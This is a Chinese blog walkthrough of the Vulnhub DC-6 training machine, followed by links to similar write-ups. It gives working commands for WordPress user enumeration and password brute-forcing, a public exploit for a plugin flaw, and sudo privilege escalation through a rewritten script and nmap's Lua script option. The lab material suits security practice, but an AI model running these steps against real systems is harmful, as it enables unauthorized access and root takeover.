Vulnhub:DC-6靶机

已于 2023-06-07 23:38:40 修改
阅读量240 收藏
点赞数
文章标签: 网络安全 web安全 安全
于 2023-04-01 17:33:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/129900114
版权

kali:192.168.111.111

靶机:192.168.111.247

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.247

访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问

使用wpscan爆破目标用户

wpscan --url http://wordy -e u

爆破用的密码字典根据作者提示可以进行筛选

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破出mark用户的密码

wpscan --url http://wordy -U user.txt -P passwords.txt

漏洞利用

登录后台后发现存在漏洞的插件

利用exp拿shell

cp /usr/share/exploitdb/exploits/php/webapps/50110.py .
python3 50110.py

提权

在/home/mark/stuff/things-to-do.txt提示用户信息:graham|GSo7isUM1D4

切换到graham用户查看sudo权限

修改/home/jens/backups.sh文件,切换到jens用户

echo '/bin/bash' > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

查看jens用户的sudo权限

提权方法:nmap | GTFOBins

TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
chmod 777 /tmp/tmp.zAaLfg44ZA
sudo -u root nmap --script=$TF

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 654
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2461
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
vulnhub:DC-6靶机
qq_63283137的博客
09-14 249
有个root权限执行的nmap,nmap--script 参数可以执行脚本,只需写入提权脚本到此文件,再执行。这个文件中写入/bin/bash命令,然后以jens用户身份运行就可以获取到jens的shell了。水平越权,ssh链接此用户,sudo -l查看可以使用其他shell执行的文件。这账号不是root权限,一般home有用户信息,找到文件中有一组账户密码。扫描wordpress中的存在的用户,并写入到user.txt文件中。页面登录成功,这账户没啥操作权限,发现wordpress的一个插件。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1508
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 739
Vulnhub靶机:DC-1渗透详细过程
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1062
Vulnhub-DC-3靶机实战
vulnhub DC-6靶机实战
m0_51195235的博客
10-31 793
vulnhub靶机实战
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1562
Vulnhub-DC-6靶机实战(Nmap提权)
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 225
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
什么是网络安全态势感知
最新发布
m0_66268916的博客
08-13 131
德迅云安全 态势感知采用先进大数据架构,通过采集系统的网络安全数据信息,对所有安全数据进行统一处理分析,实现对网络攻击行为、安全威胁事件、日志、流量等网络安全问题的发现和告警,打造安全可监控、威胁可感知、事件可控制的安全能力。态势感知是一种基于环境的、动态、整体地洞悉安全风险的能力,是以安全大数据为基础,从全局视角提升对安全威胁的发现识别、理解分析、响应处置能力的一种方式、最终是为了决策与行动,是安全能力的落地。通过列表、搜索、详情等方式对告警进行展示,支持告警溯源和攻击链分析,让每一次攻击都无处可藏。
《密码编码学与网络安全原理与实践》第十一章、第十二章、第十三章 数据完整性算法
m0_57291352的博客
08-13 478
认证函数与保密函数的分离能提供结构上的灵活性(认证与保密可在网络协议的不同层次进行);f函数在每个输入消息块被Hash时执行一次,函数的输入是1600位的状态变量s,将s转换为由64位纵构成的5*5矩阵,然后函数对矩阵执行24圈操作,每一圈包括5个步骤,每个步骤通过置换或代换操作作对状态矩阵进行更新。如果算法使用伪随机函数(PRF)来产生诸如会话密码密钥之类的值,那么要求仅有PRF的使用者知道种子,如果该算法用于产生流密码的加密密钥流,那么种子的作用是仅为发送方和接收方知道的密钥。64]中的四分之一。
网络安全流程规范文件解读(安全专业L1级)
qyq88888的专栏
08-11 932
网络运行重大故障定义涵盖了现网各类重要业务和设备:1.重大业务故障:话音业务、数据业务、互联互通业务2.重大设备故障:传输网、承载网(IP承载网及CMNET)、无线接入网、核心网、语音增值平台、数据网、网管网、电源、空调。3.TD网络重大故障。
VulnHub入门教程:DC-1靶场攻破指南
6. **问题解决**:遇到新问题时,搜索能力很重要。初学者可能会碰到前所未见的挑战,这时使用搜索引擎(如 Google)寻找解决方案是非常常见的做法。 7. **安全道德**:在进行渗透测试时,必须始终遵循道德规范,仅...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值